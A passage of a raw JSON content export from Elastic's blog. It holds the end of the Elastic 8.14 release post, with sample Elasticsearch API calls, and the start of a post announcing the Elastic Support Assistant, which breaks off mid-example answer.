editor.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1ddfb77f67388043"}}},{"image":{"image":{"uid":"blt79449003d56ed925","_version":1,"title":"5.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-05-30T18:01:53.669Z","updated_at":"2024-05-30T18:01:53.669Z","content_type":"image/png","file_size":"503824","filename":"5.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-06-05T17:12:02.034Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt79449003d56ed925/6658bf11b4796f71a0a2f2a7/5.png"},"_metadata":{"uid":"cs9b03904db11d9d11"},"caption_l10n":"","alt_text_l10n":"5 - Region map goes GA","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":" New Spanish plural stemmer","_metadata":{"uid":"csf67fbc63eba10f45"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn 8.14, we are adding support for a Spanish stemmer in addition to the Spanish stemmer we already offer and will continue to support. This new stemmer transforms plural to singular but does not alter gender, so it is suitable for particular use cases.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Use MaxMind Enterprise and Anonymous IP files with ingest GeoIP processors","_metadata":{"uid":"cs563f1e22da839491"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOur customers rely on GeoIP enrichment to help them locate customer problems, screen transactions for fraud, identify security threats and suspicious activity, and more. You can use the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/geoip-processor.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eGeoIP enrich ingest processor\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to add information about the location of an IP address to an incoming document, such as a log entry or security event. We automatically download the latest free \u003c/span\u003e\u003ca href=\"https://dev.maxmind.com/geoip/geolite2-free-geolocation-data\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eMaxMind GeoLite2 databases\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to ensure they are up to date (as required by MaxMind’s EULA) and distribute them throughout the cluster to be used by ingest processing.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis is convenient and satisfies many customers and use cases. However, some enterprises need the additional accuracy and fields that are offered by the paid GeoIP files, such as the \u003c/span\u003e\u003ca href=\"https://www.maxmind.com/en/solutions/geoip2-enterprise-product-suite/enterprise-database\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eGeoIP2 Enterprise Database\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and the \u003c/span\u003e\u003ca href=\"https://www.maxmind.com/en/solutions/geoip2-enterprise-product-suite/anonymous-ip-database\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eGeoIP2 Anonymous IP Database\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. This enables them to have more confidence in the decisions they make based on the geolocation data, such as blocking potentially fraudulent transactions or denying access to services.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch 8.14 adds support for using those two paid geo databases with the GeoIP ingest processor in technical preview. In 8.14, you will have to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/geoip-processor.html#manage-geoip-database-updates\"\u003e\u003cspan style='font-size: 12pt;'\u003emanage the download and deployment\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e of the files. We’re working to add automatic downloading of these files to a future release to make it more seamless to keep them updated.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Enrich policies can target data streams","_metadata":{"uid":"csf21ed8df18b8dd59"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSpeaking of enrichment, it’s now easier to use a data stream as the source of reference data for \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest-enriching-data.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eenrich policies\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. Previously, if a data stream was targeted by an enrich policy like the following . . .\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs840bd6a3da870162"}}},{"code":{"code":"PUT /_enrich/policy/my-policy\n{\n \"match\": {\n \"indices\": [\"data_stream\"],\n \"match_field\": \"fieldA\",\n \"enrich_fields\": [\"fieldB\", \"fieldC\"]\n }\n}","_metadata":{"uid":"csad14382526ccfc53"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0435cd68968f9920"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e. . . then an \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eindex_not_found_exception\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e error was returned. Elasticsearch 8.14 now supports specifying a data stream as the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eindices\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e source, so you can benefit from the time series management features of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/data-streams.html\"\u003e\u003cspan style='font-size: 12pt;'\u003edata streams\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and use them for enrichment at the same time.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Write to an index after ILM shrink","_metadata":{"uid":"cs094dbfde8f756791"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou might be using the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-shrink.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eILM shrink action\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to reduce the number of primary shards in an index once it no longer needs extra-high write parallelism for indexing throughput. A source index must be read only during the shrink processing, so ILM sets them to read-only. Historically, ILM would also leave the new (shrunken) index read-only, blocking writes.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe heard from users who need to be able to write to the shrunken index as updates arrive for older documents, so we added an option (\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eallow_write_after_shrink\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e) to remove the write block after shrinking. For backward compatibility, this configuration parameter defaults to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003efalse\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, thus keeping the target index read-only.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"User information in the slow log","_metadata":{"uid":"cs6a77e9e835c597e1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.14/index-modules-slowlog.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eslow log\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e is one of the main troubleshooting resources to identify and fix problematic queries that don’t perform well and that may affect the entire system. One of the main hurdles was to identify the user that performed the query since it’s not always clear to figure it out looking at the query itself.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn Elasticsearch 8.14, it’s now possible to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.14/index-modules-slowlog.html#_identifying_search_slow_log_origin\"\u003e\u003cspan style='font-size: 12pt;'\u003etrack the calling user information\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e directly in the slow log so that administrators can solve problems more efficiently.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou can enable it for both index and search log entries by calling the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.14/indices-update-settings.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eUpdate index settings API\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs4877b81c7a6fe9c9"}}},{"code":{"code":"PUT /my-index-000001/_settings\n{\n \"index.indexing.slowlog.include.user\": true,\n \"index.search.slowlog.include.user\": true\n}","_metadata":{"uid":"csd857eed69570c233"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs80f86ff75dba7581"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAfter that, the output will report user information:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs584146eb3a6a9cc7"}}},{"code":{"code":"…\n \"auth.type\": \"REALM\",\n \"auth.name\": \"elastic\",\n \"auth.realm\": \"reserved\"\n…","_metadata":{"uid":"cs2b96c9afa5280942"}}},{"title_text":{"title_text":[{"title_l10n":"Try it out","_metadata":{"uid":"csc1f645097fcba573"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eRead about these capabilities and more i\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003en the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/welcome-to-elastic/current/new.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003erelease notes\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eExisting Elastic Cloud customers can access many of these features directly from the \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Cloud console\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. Not taking advantage of Elastic on cloud? \u003c/span\u003e\u003ca href=\"https://www.elastic.co/cloud/cloud-trial-overview\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eStart a free trial\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7e24f1feb5b2adfe"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs901ad4a9b45b8adb"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa372174167c68e3a"}}}],"publish_date":"2024-06-05","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Elastic Platform 8.14: ES|QL GA, encryption at rest \u0026 vector search optimizations","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt7bb6b1e9a797738f","ACL":{},"created_at":"2020-06-17T03:36:25.048Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"logstash","label_l10n":"Logstash","tags":[],"title":"Logstash","updated_at":"2020-06-17T03:36:25.048Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:34.237Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltb4928f8cf10d2cff","ACL":{},"created_at":"2023-11-06T21:35:16.245Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"vector-search","label_l10n":"Vector search","tags":[],"title":"Vector search","updated_at":"2023-11-06T21:35:16.245Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.491Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltdeb5e512cabf0e10","ACL":{},"created_at":"2023-11-03T17:34:50.549Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"platform","label_l10n":"Platform","tags":[],"title":"Platform","updated_at":"2023-11-03T17:34:53.443Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.235Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt51b1e697c0c14e97","_version":1,"created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-01-11T17:28:41.590Z","updated_at":"2024-01-11T17:28:41.590Z","content_type":"image/jpeg","file_size":"160216","filename":"platform-release-blog.jpg","title":"platform-release-blog.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-01-17T19:00:25.386Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt51b1e697c0c14e97/65a02549d6cafb1e25f75010/platform-release-blog.jpg"},"title":"Elastic Platform 8.14: ES|QL GA, encryption at rest, and vector search optimizations","title_l10n":"Elastic Platform 8.14: ES|QL GA, encryption at rest, and vector search optimizations","updated_at":"2025-01-17T22:05:20.982Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/whats-new-elasticsearch-platform-8-14-0","publish_details":{"time":"2025-01-17T22:05:27.366Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt85800e7ffc9d81e6","_version":6,"locale":"en-us","ACL":{},"abstract_l10n":"We are excited to announce the launch of Elastic's Support Assistant. This blog takes you through a tour of our latest generative AI tool and some common scenarios where it can help with your own use of Elastic technology. ","author":["blt57f0334083eb9790","blt99432b7452d0b36f"],"category":["bltc17514bfdbc519df"],"created_at":"2024-09-04T14:46:01.173Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs809b5451c07cc829"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe are excited to announce the launch of Elastic's Support Assistant. This blog takes you through a tour of our latest generative AI tool and some common scenarios where it can help with your own use of Elastic technology.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elastic Support Assistant is now available on the Support Hub ","_metadata":{"uid":"cse70cfbb8e3340fd5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eToday we announce the general availability of the Elastic Support Assistant for all customers and trial users with a support account, accessible through the \u003c/span\u003e\u003ca href=\"https://support.elastic.co\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSupport Hub\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. The Support Assistant is a generative AI powered chat experience designed to answer a wide range of product questions across all Elastic products. We have documented the build through a series of technical blogs highlighting interesting steps along the way. Read more:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/genai-customer-support-building-proof-of-concept\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ePart 1: Building our proof of concept\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/genai-customer-support-building-a-knowledge-library\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ePart 2: Building a Knowledge Library\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/genai-elastic-elser-chat-interface\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ePart 3: Designing a chat interface for chatbots... for humans\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elser-rag-search-for-relevance\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ePart 4: Tuning RAG Search For Relevance\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Overview: AI Assistants at Elastic","_metadata":{"uid":"csf8da4795024d62b9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eJust as generative AI has moved faster than anyone could have expected, Elastic has moved fast and developed assistants aimed at solving different use cases for our customers. Here is a quick overview of the assistants that are available to customers today:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/observability/current/obs-ai-assistant.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eObservability AI Assistant\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eProvides insights and chat support for observability data analysis and issue remediation\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIntegrates with external AI models for contextual assistance\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eRequires an Enterprise subscription and Elastic Stack 8.9 or later\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/security-assistant.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eSecurity AI Assistant\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAids in cybersecurity tasks like alert investigation and incident response\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUses generative AI to interact and generate queries in natural language\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eRequires an Enterprise subscription and is available from Elastic Stack 8.8.1 onward\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSupport Assistant (this product launch)\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eChat experience providing general support across all Elastic products, informed by all of our available context (product documentation, blogs, Knowledge Base, etc.)\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUses generative AI and a retrieval augmented architecture to summarize content to answer specific questions\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNot dependent on deployment version or subscription level\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"How to access the Support Assistant","_metadata":{"uid":"csec62f9a095f1676d"},"header_style":"H2","paragraph_l10n":""}],"_metadata":{"uid":"cs6e0b72e513322f3b"}}},{"video":{"vidyard_uuid":"LtopfhYfiJgK3DHSw8XxGm","_metadata":{"uid":"cs2c5e3c1f2778d842"},"caption_l10n":"","shadow":false,"video_play_count":"","muted":false,"loop_video":false,"hide_controls":false,"looping_animation":false}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf809ee9d2f7e4279"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Elastic Support Assistant is now available in the \u003c/span\u003e\u003ca href=\"https://support.elastic.co\"\u003e\u003cspan style='font-size: 12pt;'\u003eSupport Hub\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e for all Elastic customers with either a trial or an active subscription. Once logged in, the Support Assistant can be found in the lower right corner. From there, you can start your first conversation.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Support Assistant is designed to help with technical insights into Elastic technology and has access to the entirety of Elastic’s blogs, product docs for 114 major/minor versions of Elastic, technical support articles, and onboarding guides. While it does not have access to any deployment health information or your data, the Support Assistant is deeply knowledgeable about Elastic across a wide span of use cases. Over 200 of our own Elasticians use it daily, and we’re excited to expand use to Elastic customers as well.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Ways to leverage the Support Assistant for your deployments","_metadata":{"uid":"cs465a46af6b662511"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Support Assistant is designed to enhance our customers' Elastic technical product knowledge, and its accuracy is continually being refined. However, as with all AI tools, users should exercise caution, as responses may vary. It is recommended to verify the information provided with source documentation to ensure accuracy.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e1. Troubleshooting configurations\u003cbr /\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eIf you encounter issues during deployment or configuration, the Support Assistant can provide guidance tailored to the specific versions of Elastic that you explicitly mention. For example, if you're setting up a new 8.14 cluster and run into errors, the Assistant can help diagnose the problem by cross-referencing your issue with related documentation and known issues from the Elastic product docs and knowledge base.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis can be particularly helpful when you aren’t sure where to find a specific error. Instead of searching the Kibana docs for an error that is actually for Elasticsearch, the Assistant can save time by figuring out the appropriate context for you.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e2. Performance tuning\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cbr /\u003eYou can query the Support Assistant for best practices on optimizing the performance of your Elasticsearch clusters. Whether you're dealing with slow queries or need advice on resource allocation, the Assistant can suggest configuration changes, shard management strategies, and other performance-enhancing techniques based on your deployment's specifics.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e3. Upgrades\u003cbr /\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003ePlanning to upgrade to a newer version of Elastic? The Support Assistant can find the needed steps to guide you through the upgrade process, highlighting potential breaking changes and offering recommendations for a smoother experience.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e4. Security and compliance\u003cbr /\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eThe Assistant can offer guidance on securing your Elastic deployment, from setting up \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.15/authorization.html\"\u003e\u003cspan style='font-size: 12pt;'\u003erole-based access control\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e (RBAC) to configuring \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.11/security-settings.html#ssl-tls-settings\"\u003e\u003cspan style='font-size: 12pt;'\u003eencryption\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.11/auditing.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eaudit logging\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. For customers in regulated industries, it can also provide information on how Elastic's security features align with compliance requirements like GDPR or HIPAA.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e5. Monitoring and alerting\u003cbr /\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eThe Support Assistant can help with providing steps for setting up monitoring for your deployment. Whether you need to configure Kibana dashboards or set up alerting for specific events, the Assistant can walk you through the necessary steps, ensuring your deployment remains healthy and issues are flagged promptly.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce you’re up and running with your monitoring and alerting, the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/observability/8.15/obs-ai-assistant.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eObservability AI Assistant\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e can help to answer any questions you have about the data you collect.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e6. Custom use cases and integrations\u003cbr /\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eIf you're looking to extend Elastic's capabilities by integrating it with other tools or building custom applications, the Support Assistant can provide code snippets, integration guides, and examples relevant to your specific needs. It can help you troubleshoot issues with Logstash pipelines, Kibana visualizations, or Beats configurations.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What do Elasticians ask the Support Assistant?","_metadata":{"uid":"cs6563a2c8dd674020"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOur internal teams rely on the Support Assistant in their daily workflows. Here are a few examples they found useful, which might offer ideas on how you can make use of it.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Synthesizing answers across multiple documents","_metadata":{"uid":"cs31053b19d2c3e8c9"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eQuestion:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Explain the difference between query_string and query terms in Elasticsearch.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSupport Assistant’s answer:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8e9d177ffb5f69f1"}}},{"code":{"code":"In Elasticsearch, `query_string` and `terms` queries serve different purposes and have distinct behaviors:\n\n1. `query_string` Query:\nThe `query_string` query is a powerful query that allows you to execute complex searches using a query string syntax. It can parse and split the provided query string based on operators such as AND, OR, NOT, and more. The `query_string` query supports field-specific queries, wildcards, regular expressions, fuzziness, proximity searches, and range queries. It is very flexible but also strict; if the query string contains any invalid syntax, it will return an error. Due to its complexity and strictness, it is not recommended for direct use in 